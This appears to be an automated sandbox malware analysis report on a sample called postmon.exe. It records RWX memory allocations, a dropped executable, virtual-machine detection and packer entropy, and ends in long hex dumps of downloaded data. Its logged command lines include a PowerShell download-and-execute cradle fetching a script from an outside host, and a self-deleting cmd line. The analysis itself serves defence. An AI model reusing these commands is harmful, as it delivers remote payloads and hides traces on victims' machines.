NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00026000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00113000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000dc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff000d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff0001a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007ff00161000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 28, 2023, 5:15 p.m.	process_identifier: 2220 region_size: 16384 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002a17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (5 events)

cmdline	C:\Windows\System32\cmd.exe /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline	powershell -command IEX(New-Object Net.Webclient).DownloadString('http://elturky.net/ERP/public/js/debug2.ps1')
cmdline	"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('http://elturky.net/ERP/public/js/debug2.ps1')"
cmdline	"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL
cmdline	C:\Windows\sysnative\cmd.exe /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('http://elturky.net/ERP/public/js/debug2.ps1')"

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\postmon.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW July 28, 2023, 5:22 p.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd.exe parameters: /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('http://elturky.net/ERP/public/js/debug2.ps1')" filepath: C:\Windows\sysnative\cmd.exe	1	1	0
ShellExecuteExW July 28, 2023, 5:22 p.m.	show_type: 0 filepath_r: C:\Windows\system32\cmd.exe parameters: /c ping 127.0.0.1 && del "C:\Users\test22\AppData\Local\Temp\postmon.exe" >> NUL filepath: C:\Windows\System32\cmd.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 28, 2023, 5:15 p.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x0003a800', u'virtual_address': u'0x00033000', u'entropy': 7.964945977032195, u'name': u'.data', u'virtual_size': u'0x0003b520'}

entropy

7.96494597703

description

A section with a high entropy has been found

entropy

0.478527607362

description

Overall entropy of this PE file is high

URL downloaded by powershell script (8 events)

Data received	0x01, 0x1e, 0x56, 0x5e, 0xa8, 0x87, 0xd2, 0xa3, 0xdf, 0x43, 0xe4, 0xd0, 0x56, 0xde, 0x8e, 0xa4, 0xba, 0x1e, 0x11, 0x23, 0x68, 0xa2, 0xa9, 0x76, 0xbc, 0x75, 0x81, 0xa9, 0xf6, 0x04, 0xa3, 0x29, 0xe3, 0x1e, 0x5e, 0x6a, 0xd5, 0xf2, 0x7c, 0x6e, 0xad, 0x64, 0x4f, 0xd4, 0xe3, 0x7c, 0xad, 0x60, 0xa0, 0x8f, 0xbb, 0xe8, 0x33, 0xf5, 0x7f, 0xa1, 0xcd, 0xe9, 0x97, 0xff, 0x6d, 0xb1, 0xbd, 0x59, 0x24, 0x5e, 0x2e, 0x50, 0x5a, 0x6f, 0x37, 0x4c, 0x4a, 0x3e, 0x81, 0x2e, 0xc8, 0x99, 0x78, 0xbf, 0x2c, 0x50, 0x10, 0x39, 0x39, 0xee, 0x58, 0x80, 0xe2, 0x50, 0x20, 0x54, 0x22, 0x8c, 0x55, 0x33, 0xe9, 0xf5, 0x29, 0x96, 0x94, 0xc0, 0xd1, 0x01, 0x6c, 0xdc, 0x19, 0x2d, 0xbf, 0x6d, 0xee, 0xaf, 0xdc, 0x11, 0xb5, 0x90, 0x24, 0x66, 0xb1, 0x83, 0x7a, 0xcb, 0x51, 0xb3, 0x79, 0x37, 0x1c, 0x8f, 0x8b, 0x54, 0xbb, 0xf8, 0xa0, 0x65, 0x7a, 0x73, 0x7f, 0x08, 0x71, 0xe0, 0x81, 0x43, 0x80, 0xb9, 0xe1, 0xf4, 0xc6, 0x0f, 0x2a, 0x86, 0x87, 0x06, 0x45, 0xaf, 0x1e, 0x6a, 0x9d, 0x7f, 0x93, 0x93, 0x48, 0x12, 0x76, 0xcf, 0x21, 0x6e, 0x1e, 0x7d, 0x4e, 0xcc, 0x78, 0xc5, 0x85, 0x3c, 0x5d, 0x06, 0x8a, 0x8e, 0x56, 0xcd, 0x0c, 0xf7, 0xa7, 0xb5, 0xd0, 0xf1, 0xb6, 0x88, 0x3f, 0x7f, 0xde, 0xde, 0xa8, 0xad, 0x01, 0xe2, 0xbe, 0x32, 0xd6, 0x27, 0x77, 0x75, 0xe9, 0xff, 0x6c, 0x26, 0xc9, 0xa9, 0xc9, 0x1e, 0x18, 0x8a, 0x82, 0x0e, 0xd7, 0x2b, 0xe9, 0x3e, 0x90, 0x72, 0x15, 0x9b, 0x84, 0xb9, 0x30, 0x76, 0xc6, 0xd3, 0x5f, 0xba, 0x99, 0xe8, 0x1f, 0xef, 0xca, 0x89, 0x17, 0x27, 0x08, 0x4f, 0x25, 0xff, 0x78, 0xa2, 0x97, 0x43, 0xae, 0xc2, 0x7e, 0xa8, 0x70, 0xa3, 0xbd, 0x50, 0x5d, 0x60, 0xb9, 0xf5, 0xac, 0x79, 0x85, 0xfa, 0x19, 0xac, 0xf0, 0xcd, 0x93, 0x76, 0x5d, 0xbd, 0x97, 0x6f, 0x86, 0x0b, 0xae, 0xd9, 0x67, 0xae, 0xd1, 0x93, 0xb5, 0x85, 0x21, 0x12, 0x50, 0x40, 0x6f, 0xc7, 0x77, 0xe2, 0x9f, 0x33, 0x64, 0xb5, 0x28, 0x02, 0x11, 0xa9, 0x73, 0x2e, 0x4b, 0xe9, 0x66, 0x5d, 0x24, 0x90, 0x77, 0x54, 0x8c, 0xea, 0xaa, 0x8a, 0x5c, 0x4d, 0x61, 0xc0, 0xa6, 0x57, 0x68, 0x32, 0x5d, 0x8e, 0x8b, 0x58, 0x62, 0x68, 0x28, 0xb5, 0x60, 0x7a, 0x6f, 0xc3, 0x7f, 0x23, 0x4a, 0x08, 0x24, 0x53, 0x66, 0x60, 0x59, 0xa8, 0x8a, 0x0f, 0x87, 0x43, 0x1f, 0x9f, 0xde, 0x97, 0x2e, 0x43, 0x48, 0x69, 0x79, 0xfb, 0x82, 0x5c, 0x5a, 0xf6, 0xa9, 0xbf, 0x54, 0xe6, 0x6e, 0x9e, 0xb6, 0xb4, 0x73, 0xd5, 0x64, 0xe4, 0x25, 0x85, 0x5d, 0x54, 0xca, 0x0c, 0xfa, 0x74, 0x33, 0x7e, 0x22, 0xf0, 0x88, 0x3a, 0xff, 0x12, 0x1f, 0xac, 0x4c, 0x22, 0x40, 0x24, 0xaa, 0x43, 0x7c, 0x26, 0x26, 0xb2, 0xd7, 0x25, 0x47, 0x06, 0x2c, 0x59, 0xe0, 0x38, 0x5c, 0xef, 0xbb, 0xa2, 0x8f, 0xb9, 0x1a, 0xe0, 0x46, 0xae, 0x74, 0x69, 0x2a, 0x25, 0x24, 0x29, 0x04, 0x5c, 0x18, 0x81, 0x08, 0x53, 0xfe, 0x24, 0x84, 0xa6, 0x35, 0xeb, 0x32, 0xe3, 0xd1, 0x84, 0xae, 0xa3, 0xb3, 0xd1, 0xd4, 0x2f, 0x88, 0x10, 0x9d, 0xac, 0x10, 0xac, 0x22, 0x23, 0xe6, 0xe6, 0x54, 0x56, 0xc3, 0xad, 0xab, 0x23, 0x99, 0x35, 0xec, 0x23, 0xe8, 0x2b, 0xba, 0x97, 0xb7, 0xbd, 0xa2, 0xc8, 0x04, 0x20,
Data received	xa4, 0x4f, 0xfc, 0x6c, 0x6e, 0x50, 0x50, 0x0b, 0x91, 0x61, 0x6f, 0xcc, 0xa6, 0x61, 0x19, 0xab, 0xc2, 0xfc, 0xc8, 0x96, 0xe4, 0x47, 0x61, 0x06, 0x54, 0xa8, 0x15, 0xf9, 0x54, 0x06, 0xb3, 0x26, 0xc8, 0xe5, 0x2b, 0x15, 0xd1, 0xee, 0x24, 0x3a, 0xc2, 0xfc, 0x6c, 0x49, 0x69, 0x54, 0xc1, 0xa3, 0x8f, 0x3e, 0x8c, 0x1c, 0x06, 0xda, 0x43, 0x68, 0xc8, 0x56, 0x75, 0x1b, 0x43, 0xfd, 0x0f, 0x51, 0x23, 0x1f, 0x20, 0x5e, 0x71, 0xae, 0xa3, 0xbe, 0xd2, 0x12, 0x3d, 0x96, 0x70, 0x06, 0x57, 0x95, 0xb4, 0x65, 0xea, 0xe3, 0x82, 0x93, 0xcd, 0x76, 0xab, 0xc3, 0xbe, 0x63, 0x0e, 0x81, 0x8e, 0x29, 0xe1, 0x87, 0x20, 0x01, 0x49, 0x20, 0x9e, 0x8e, 0x75, 0xfc, 0xcd, 0x84, 0x71, 0xd5, 0x35, 0x7d, 0xc3, 0x5c, 0x1c, 0x61, 0x7e, 0xf6, 0x26, 0xed, 0xf1, 0xa3, 0xab, 0x74, 0x73, 0x91, 0x7c, 0xb1, 0xa2, 0x37, 0x9e, 0x84, 0xbf, 0xe8, 0x64, 0x10, 0x68, 0xd6, 0xdd, 0xba, 0xb6, 0xa8, 0xed, 0x2c, 0x12, 0x06, 0x85, 0x63, 0x47, 0xb1, 0xa7, 0x21, 0xbb, 0x7a, 0xd3, 0x48, 0xca, 0x5c, 0xcc, 0xb3, 0x39, 0x63, 0xc6, 0xfb, 0x6b, 0xe5, 0x10, 0x0a, 0x61, 0xc4, 0x41, 0xfc, 0xe6, 0x80, 0xa1, 0x90, 0x02, 0x88, 0x9d, 0x95, 0xe0, 0xbe, 0xd0, 0x88, 0xd4, 0xb2, 0xf0, 0xa3, 0xe9, 0x20, 0x86, 0x5b, 0x8c, 0x1e, 0x2f, 0xe8, 0xb9, 0xce, 0x63, 0x4b, 0x2c, 0x87, 0xf4, 0x86, 0x9e, 0x48, 0xb8, 0x0a, 0x68, 0xb2, 0xfc, 0x0d, 0x6e, 0x15, 0x8e, 0xb8, 0xe7, 0x6f, 0xf0, 0xb4, 0xca, 0x30, 0xd5, 0x2a, 0x17, 0x6f, 0xd0, 0x86, 0x99, 0x7b, 0xd0, 0x27, 0x61, 0x88, 0xf4, 0x22, 0xc9, 0x7a, 0x8b, 0xc2, 0x94, 0x23, 0x0d, 0xd0, 0x40, 0xc4, 0x09, 0xa1, 0x87, 0x0d, 0xd0, 0x90, 0x68, 0xd3, 0xb2, 0x37, 0x2a, 0xe1, 0x99, 0x79, 0x4d, 0xc8, 0x1b, 0x54, 0xf7, 0x00, 0x0a, 0xec, 0xd1, 0x33, 0x90, 0xdb, 0x26, 0x91, 0x41, 0x07, 0x92, 0xc4, 0x1a, 0xd4, 0x46, 0xc2, 0xe0, 0x13, 0x61, 0x78, 0x03, 0x7f, 0x1f, 0xf5, 0xf9, 0xf5, 0x6b, 0x7f, 0x1d, 0x96, 0xea, 0x76, 0x1d, 0x98, 0x39, 0x04, 0xf6, 0x69, 0x49, 0x63, 0x1b, 0x13, 0xae, 0xbe, 0x7b, 0x3e, 0x28, 0x77, 0x29, 0x6d, 0x94, 0x74, 0x2b, 0xe3, 0xb5, 0xa5, 0xcb, 0x30, 0xce, 0xb0, 0x0e, 0x87, 0x24, 0x78, 0x50, 0x2b, 0x43, 0xdb, 0x4d, 0x7d, 0xd0, 0xc8, 0x5a, 0x67, 0xd4, 0x0d, 0x98, 0x57, 0xd5, 0xa1, 0x90, 0xc3, 0x9b, 0xca, 0xa7, 0x90, 0x07, 0x30, 0x8c, 0xb7, 0x22, 0x49, 0x4b, 0x43, 0x25, 0x1f, 0x18, 0xae, 0x3d, 0x99, 0xa7, 0x3d, 0x97, 0x2a, 0x67, 0xc9, 0xcf, 0xf3, 0xfb, 0xd2, 0x26, 0x4b, 0x92, 0xd3, 0x37, 0xcd, 0x6a, 0x36, 0x6e, 0xe7, 0x86, 0xa5, 0xcb, 0xab, 0xa3, 0xde, 0x65, 0x4f, 0x78, 0x9d, 0xc2, 0xd5, 0x2c, 0xc0, 0xee, 0x1d, 0x43, 0x82, 0x7a, 0xf7, 0x76, 0x8a, 0x37, 0x8a, 0x8e, 0xb5, 0xba, 0x7f, 0xfd, 0xa5, 0x21, 0xfa, 0x6e, 0x1c, 0x6a, 0x4c, 0x1a, 0x12, 0xda, 0x79, 0xa9, 0xff, 0xeb, 0xa8, 0xfb, 0xd2, 0xa9, 0xa9, 0xfc, 0xa4, 0x9b, 0xb6, 0xb8, 0x5f, 0x3d, 0x49, 0xa9, 0x59, 0xc7, 0x77, 0x7f, 0xd0, 0x9b, 0x1e, 0xcc, 0x88, 0x9b, 0x3c, 0xcf, 0x77, 0x89, 0x2a, 0x46, 0x5d, 0x9c, 0xb8, 0x56, 0x79, 0xd2, 0xbe, 0xf2, 0x93, 0x0d, 0xd6, 0x74, 0x29, 0xe4, 0x8d, 0x33, 0xc5, 0xf
Data received	0x58, 0x28, 0x46, 0x77, 0xc6, 0xa2, 0xa4, 0x7d, 0xda, 0xfa, 0x34, 0x32, 0xb7, 0xf3, 0x84, 0x1b, 0x73, 0xaf, 0xff, 0x33, 0x5e, 0xcd, 0x19, 0xf1, 0x8a, 0xc7, 0xfd, 0x13, 0xa6, 0xb6, 0xe4, 0xf2, 0x79, 0xe2, 0x72, 0xaf, 0xa0, 0xdf, 0x55, 0xca, 0xbc, 0x33, 0x1a, 0x08, 0xb4, 0x81, 0xae, 0x62, 0x5f, 0x07, 0xd2, 0x61, 0x17, 0xe3, 0xce, 0xd0, 0xb9, 0xa1, 0xd1, 0x8d, 0x3c, 0x99, 0x38, 0xcb, 0xff, 0xb0, 0x84, 0x67, 0x19, 0x89, 0x30, 0x84, 0x7a, 0x49, 0x51, 0xd6, 0xc1, 0xb9, 0xdd, 0xc1, 0xe5, 0x55, 0x01, 0xe7, 0xe1, 0xfb, 0x88, 0x82, 0x8b, 0x80, 0x04, 0x32, 0xe9, 0xdb, 0x49, 0xc4, 0x16, 0xf2, 0x8e, 0xac, 0x37, 0x67, 0x4c, 0x17, 0x3b, 0x14, 0x8e, 0xda, 0xbd, 0x79, 0x06, 0xc1, 0x02, 0x45, 0xbb, 0xe9, 0x40, 0x94, 0x4f, 0x96, 0x5a, 0x7d, 0x8d, 0x4c, 0x05, 0xd7, 0xd9, 0x06, 0x4c, 0x73, 0x42, 0x3c, 0x43, 0xb8, 0xfb, 0x60, 0xa5, 0xe5, 0x22, 0x6a, 0x82, 0x98, 0xcb, 0xeb, 0x41, 0x2e, 0x33, 0x45, 0xdf, 0x90, 0xfc, 0xee, 0x00, 0x1a, 0x0e, 0x7a, 0xb2, 0x7a, 0xa8, 0xdb, 0xde, 0x1f, 0xdb, 0xf1, 0x65, 0xca, 0x53, 0x4e, 0x6a, 0xa6, 0x44, 0x2f, 0x0c, 0x6e, 0x8e, 0x6f, 0x6a, 0xe0, 0x9f, 0x0c, 0x13, 0xcb, 0xba, 0x0d, 0xe0, 0x09, 0x8e, 0x02, 0x09, 0xd3, 0xde, 0x6a, 0x08, 0x72, 0x47, 0x18, 0xd3, 0xd6, 0x1c, 0x5f, 0x45, 0x81, 0x05, 0x29, 0xbe, 0x16, 0x98, 0x40, 0x28, 0xfb, 0xe7, 0x55, 0x22, 0x99, 0x9b, 0x67, 0xc6, 0x90, 0x63, 0xae, 0xe3, 0xe4, 0xef, 0x08, 0x6f, 0x8c, 0xda, 0xc9, 0x93, 0x15, 0x0a, 0x29, 0x50, 0xc8, 0xd7, 0x4c, 0xd1, 0xe8, 0x9c, 0xb8, 0xf5, 0xf8, 0xe4, 0x8c, 0x66, 0xac, 0x44, 0x77, 0xbe, 0x96, 0xd7, 0x17, 0x13, 0xb5, 0x32, 0xd9, 0xe8, 0x19, 0x35, 0xac, 0x2e, 0xae, 0x0e, 0x82, 0xc3, 0x62, 0xd4, 0x65, 0xcc, 0x19, 0xe6, 0xe1, 0xe5, 0xa4, 0x9b, 0x0c, 0x4b, 0x12, 0x40, 0x32, 0xac, 0xc2, 0x4e, 0xf9, 0x2d, 0x29, 0x38, 0x5f, 0xd5, 0xed, 0xc9, 0xbb, 0x15, 0x9b, 0xf4, 0xe4, 0xf5, 0x83, 0x7d, 0xd4, 0xfa, 0xb8, 0x3b, 0xd1, 0x2d, 0x25, 0xdb, 0xbb, 0x62, 0xbf, 0x1b, 0xe1, 0x2d, 0x05, 0xa0, 0x2f, 0x1e, 0x0b, 0x92, 0x94, 0x8b, 0x68, 0x10, 0xe1, 0x0b, 0x01, 0x9b, 0x2e, 0x52, 0x25, 0x8a, 0xa4, 0x2e, 0xb4, 0xde, 0xbf, 0x7d, 0xbd, 0x44, 0x50, 0xa7, 0xe1, 0x4e, 0x91, 0x27, 0x1e, 0x14, 0xe1, 0x4d, 0x3d, 0xe6, 0xea, 0x64, 0x99, 0xc5, 0x7f, 0x5f, 0x66, 0x2b, 0x1f, 0xa6, 0xd4, 0x1c, 0x04, 0x09, 0x31, 0x5d, 0xf7, 0xd9, 0xcf, 0xd8, 0x7e, 0xab, 0x80, 0xa1, 0xdc, 0x9e, 0x31, 0xb5, 0x9a, 0xf8, 0x15, 0xfc, 0xe9, 0x96, 0x1a, 0x8e, 0x9b, 0xd4, 0x7f, 0x46, 0x21, 0xa2, 0x43, 0x7a, 0x5a, 0x28, 0x52, 0xb3, 0x5e, 0x0e, 0x04, 0x3c, 0xb5, 0x8a, 0x33, 0x46, 0xbe, 0x5f, 0xec, 0x28, 0x09, 0x7b, 0x4d, 0x23, 0xd2, 0x0a, 0xa2, 0x83, 0x6e, 0x20, 0x33, 0xcb, 0xeb, 0xc9, 0x08, 0x64, 0xed, 0xaa, 0x71, 0xa1, 0x17, 0xcd, 0x22, 0x09, 0xca, 0x31, 0xe1, 0x21, 0xb9, 0x63, 0xd8, 0xfb, 0xa3, 0xc0, 0xee, 0xd7, 0x7b, 0x13, 0x49, 0xed, 0x92, 0xa5, 0x0e, 0xf7, 0x90, 0x11, 0xb9, 0xfe, 0xf9, 0x73, 0x77, 0x22, 0x1e, 0x18, 0x76, 0xdc, 0xe2, 0xc9, 0x03, 0xa4, 0xaf, 0x57, 0x3f, 0xf4, 0x15,
Data received	e, 0x58, 0xea, 0x98, 0x3b, 0x52, 0xe0, 0x6a, 0xe2, 0xb5, 0x4d, 0x15, 0x58, 0x0f, 0x8d, 0x71, 0xcd, 0x54, 0xf5, 0x60, 0x9a, 0x2f, 0x0f, 0xff, 0x94, 0x7f, 0x12, 0xf1, 0xbe, 0xd8, 0x41, 0xcc, 0xbd, 0x51, 0xa9, 0xcf, 0x40, 0xd8, 0x94, 0x84, 0xf5, 0x30, 0x1a, 0xdb, 0x78, 0x6d, 0x41, 0x66, 0xc6, 0x52, 0x08, 0xf7, 0x2f, 0x72, 0xcb, 0xcc, 0x57, 0x66, 0xbd, 0xa9, 0x80, 0x90, 0x33, 0x97, 0x9a, 0x30, 0x10, 0xaf, 0x17, 0x2a, 0x98, 0x7a, 0x6a, 0xf2, 0x63, 0x96, 0x78, 0x8e, 0x79, 0x06, 0x33, 0x5b, 0xc6, 0x9a, 0x78, 0xf5, 0x13, 0x28, 0x0d, 0x3e, 0x6d, 0x27, 0x1d, 0xe3, 0x92, 0x7c, 0x4f, 0xfa, 0x79, 0xad, 0xc9, 0x9f, 0xdf, 0x39, 0xed, 0x85, 0x76, 0xec, 0xfa, 0x28, 0xca, 0xbd, 0xb4, 0x96, 0x00, 0xee, 0x77, 0x54, 0xd9, 0x53, 0x20, 0xc3, 0x08, 0xc2, 0x54, 0xee, 0x4a, 0xbe, 0xbc, 0xb2, 0xfb, 0x79, 0x01, 0x7c, 0x00, 0xf3, 0xf0, 0x86, 0xb4, 0xb5, 0xbc, 0x4c, 0xdd, 0xd5, 0x58, 0x14, 0x7d, 0xb4, 0x1b, 0x1c, 0x53, 0xd6, 0x1f, 0x7e, 0x1c, 0x43, 0x76, 0x49, 0x8e, 0x90, 0x89, 0x74, 0xa6, 0xd2, 0x2c, 0xe1, 0x8c, 0x93, 0x1d, 0x18, 0xdd, 0x32, 0x4d, 0x54, 0x5d, 0xcb, 0x98, 0x5a, 0x58, 0x15, 0xbc, 0xef, 0x0d, 0xa0, 0x31, 0x32, 0x21, 0xb7, 0xff, 0x4b, 0xa1, 0x7e, 0xb9, 0x2f, 0x5e, 0xf7, 0x51, 0x53, 0x50, 0x7a, 0xd5, 0xe2, 0xfa, 0x54, 0x85, 0x20, 0xd4, 0x30, 0xd3, 0xe1, 0x54, 0xc0, 0x41, 0x12, 0x97, 0x5f, 0x05, 0x72, 0x1a, 0x08, 0x37, 0x5c, 0x9e, 0x43, 0xae, 0xe1, 0x02, 0x70, 0x3c, 0x46, 0x38, 0xbf, 0xc7, 0xca, 0x50, 0xbd, 0x50, 0x48, 0x7e, 0xbb, 0xc5, 0xdd, 0x98, 0x1a, 0xf1, 0xb9, 0xfd, 0x01, 0x81, 0x69, 0x4a, 0xa5, 0xb3, 0xf8, 0x89, 0x9f, 0x5a, 0xef, 0x16, 0xef, 0x01, 0x23, 0x68, 0x73, 0x0c, 0x88, 0xc9, 0x90, 0x5d, 0xdd, 0xc2, 0xf1, 0x80, 0xc9, 0x1b, 0xa3, 0x8c, 0xe1, 0x9b, 0xbc, 0x93, 0x45, 0xe2, 0x5f, 0x33, 0x08, 0xbe, 0x74, 0x79, 0x0d, 0x64, 0x5e, 0x7a, 0xbb, 0x6a, 0xaf, 0x22, 0x77, 0xaa, 0xcb, 0x83, 0x9d, 0xc6, 0x6f, 0x92, 0xb8, 0x4b, 0xa5, 0x89, 0xb7, 0x78, 0x48, 0x9b, 0x51, 0x2f, 0xfe, 0x4b, 0x9a, 0xa5, 0x78, 0xa7, 0xe3, 0x93, 0x9c, 0x51, 0x6a, 0xf0, 0xa3, 0xa1, 0x99, 0x84, 0x8d, 0xdb, 0x7f, 0xb5, 0xe3, 0x8c, 0x70, 0xa9, 0xa1, 0xc3, 0xd1, 0x1f, 0x88, 0x56, 0x41, 0x1d, 0xa2, 0x29, 0x3e, 0xbf, 0xfa, 0x33, 0x69, 0xfb, 0xb6, 0x6e, 0xe4, 0xf7, 0x93, 0x56, 0x32, 0x6c, 0xcf, 0x68, 0x9e, 0x7f, 0xe2, 0x4d, 0x45, 0x85, 0xf2, 0x3a, 0x19, 0xb5, 0x2a, 0x3b, 0x6b, 0x56, 0x68, 0x8b, 0xce, 0x86, 0x58, 0xde, 0x6a, 0x42, 0xab, 0xf5, 0xf5, 0x37, 0x55, 0x0d, 0x9d, 0xb7, 0xa4, 0x5d, 0xe2, 0xad, 0xec, 0xcb, 0x26, 0x5d, 0x60, 0x23, 0x02, 0xcd, 0x63, 0x55, 0x6d, 0x40, 0x03, 0x3b, 0x73, 0xb4, 0xce, 0x6e, 0xc2, 0xed, 0x4d, 0x17, 0xef, 0xc9, 0xf0, 0x15, 0xfd, 0xa2, 0x24, 0xf6, 0x32, 0x50, 0x1a, 0xca, 0xc6, 0x56, 0x8e, 0x4f, 0xe2, 0x11, 0x58, 0x2d, 0x69, 0xde, 0xa0, 0xce, 0x77, 0xd1, 0x53, 0xa9, 0xd6, 0x21, 0xdb, 0x83, 0xa8, 0xdf, 0xce, 0x61, 0x4d, 0x96, 0x2c, 0x07, 0x86, 0xc8, 0x27, 0x72, 0xcd, 0x5f, 0xa1, 0xf9, 0x53, 0xac, 0x68, 0x99, 0xc4, 0x9d, 0x8f, 0xa
Data received	x01, 0xc3, 0xd4, 0x3d, 0xfe, 0xd3, 0x2b, 0x34, 0xec, 0x9e, 0xcf, 0xbc, 0xda, 0xff, 0x68, 0xc1, 0x59, 0xc5, 0xe1, 0xc6, 0x47, 0x34, 0xae, 0x65, 0x04, 0x18, 0x3d, 0xe1, 0x28, 0x70, 0x85, 0x49, 0x49, 0xd8, 0xeb, 0x6f, 0x42, 0x09, 0x2e, 0xca, 0x1b, 0x3b, 0x71, 0x59, 0x6e, 0x68, 0x46, 0x40, 0x49, 0x1f, 0x1b, 0xa3, 0xd3, 0x59, 0x62, 0x51, 0x2e, 0x9f, 0x3a, 0x5d, 0xbd, 0x23, 0xe0, 0x72, 0x69, 0x18, 0x72, 0x39, 0x55, 0xe9, 0x09, 0x33, 0xa0, 0xa1, 0x3a, 0x22, 0x10, 0xe1, 0xb4, 0xf6, 0xfc, 0xa3, 0x03, 0x38, 0xfe, 0x53, 0xc3, 0x2c, 0xa6, 0xac, 0xcd, 0xc7, 0x0f, 0x46, 0xe8, 0x7f, 0xff, 0x5e, 0x26, 0x9f, 0x16, 0x3f, 0x7c, 0x14, 0x3b, 0xff, 0x18, 0x75, 0x13, 0x5e, 0xe6, 0x66, 0xde, 0x9b, 0x4c, 0x41, 0x14, 0x14, 0x20, 0x5f, 0x37, 0xd3, 0x5e, 0x11, 0x62, 0x02, 0x03, 0x2b, 0x1e, 0xb6, 0x16, 0xaa, 0xaa, 0x4d, 0xdc, 0xa4, 0x9d, 0xd1, 0x2b, 0xdc, 0xd2, 0x6a, 0x61, 0x41, 0x02, 0xeb, 0xb3, 0x51, 0xf8, 0xd8, 0xab, 0x65, 0xf6, 0x2f, 0x7d, 0xdc, 0x6e, 0x8f, 0x43, 0x01, 0xf4, 0x86, 0x16, 0x4b, 0x65, 0x69, 0xc5, 0xe9, 0x34, 0xda, 0xa2, 0x8c, 0xc9, 0xbf, 0xdc, 0x3c, 0x76, 0xa9, 0x76, 0xc7, 0xcf, 0xd7, 0x6b, 0xf2, 0xcb, 0x0f, 0x5c, 0xdd, 0xde, 0xa2, 0x31, 0x20, 0xac, 0x87, 0x9f, 0xe1, 0x7d, 0x78, 0x80, 0x05, 0x8b, 0x86, 0x71, 0xdb, 0x43, 0x4f, 0xe7, 0x6a, 0xa3, 0xda, 0xf3, 0x9d, 0xbc, 0xba, 0x5e, 0x80, 0xf7, 0xbe, 0xe9, 0x07, 0xf6, 0xf1, 0x50, 0xb4, 0xa7, 0xb3, 0xf8, 0x5a, 0x56, 0xeb, 0x3a, 0xd6, 0xa8, 0x70, 0xf7, 0xdd, 0x87, 0xd4, 0x73, 0xbd, 0x49, 0xf9, 0x14, 0xe8, 0xb9, 0xa3, 0xc3, 0x71, 0x2e, 0x13, 0x52, 0xf1, 0x6b, 0xcd, 0xef, 0x89, 0x9a, 0xb2, 0xfb, 0xe6, 0xb5, 0x8f, 0x6a, 0x02, 0x69, 0x77, 0x0e, 0x32, 0xca, 0xb9, 0xf5, 0x26, 0xa5, 0x72, 0x97, 0x0d, 0x46, 0x01, 0x56, 0xd6, 0xb5, 0x3e, 0xa8, 0xbe, 0xd7, 0xca, 0xe9, 0xfe, 0x64, 0x72, 0x37, 0xf4, 0x1a, 0x0d, 0x9f, 0xa6, 0xaf, 0x90, 0x41, 0xf8, 0x6d, 0x88, 0x25, 0x42, 0xf2, 0x4d, 0xac, 0xaa, 0x2f, 0xcc, 0xe9, 0x77, 0x99, 0x6e, 0x86, 0x1d, 0x15, 0xc4, 0x86, 0x7b, 0x7b, 0x42, 0xdb, 0x5c, 0x1d, 0xd3, 0xd0, 0xc1, 0xe0, 0xdc, 0x0b, 0x15, 0xff, 0x61, 0xc6, 0xee, 0x03, 0x7b, 0x5e, 0xe4, 0xa5, 0xf6, 0x48, 0xe2, 0x34, 0x33, 0x25, 0xf4, 0xa4, 0x32, 0x82, 0xe4, 0x70, 0xb9, 0x76, 0x73, 0x8a, 0x0f, 0xcf, 0x4d, 0xaf, 0x33, 0x95, 0xa8, 0xd8, 0xd2, 0x87, 0x2e, 0x34, 0xe2, 0xcc, 0x6c, 0x01, 0x72, 0x1d, 0x6f, 0xec, 0x1c, 0x34, 0x95, 0x1d, 0x9e, 0x4a, 